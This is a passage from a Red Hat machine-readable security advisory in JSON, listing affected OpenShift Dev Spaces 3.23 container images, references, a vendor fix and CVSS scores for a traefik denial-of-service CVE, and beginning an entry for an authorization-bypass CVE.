          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2024-28869"
        },
        {
          "category": "external",
          "summary": "RHBZ#2274987",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2274987"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2024-28869",
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-28869"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-28869",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28869"
        },
        {
          "category": "external",
          "summary": "https://github.com/traefik/traefik/commit/240b83b77351dfd8cadb91c305b84e9d22e0f9c6",
          "url": "https://github.com/traefik/traefik/commit/240b83b77351dfd8cadb91c305b84e9d22e0f9c6"
        },
        {
          "category": "external",
          "summary": "https://github.com/traefik/traefik/security/advisories/GHSA-4vwx-54mw-vqfw",
          "url": "https://github.com/traefik/traefik/security/advisories/GHSA-4vwx-54mw-vqfw"
        }
      ],
      "release_date": "2024-04-12T00:00:00+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2025-09-15T16:27:40+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant to your system have been applied. For details on how to apply this update, refer to: https://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2025:15847"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Moderate"
        }
      ],
      "title": "traefik: denial of service"
    },
    {
      "cve": "CVE-2024-39321",
      "cwe": {
        "id": "CWE-639",
        "name": "Authorization Bypass Through User-Controlled Key"
      },
      "discovery_date": "2024-07-05T18:20:25+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
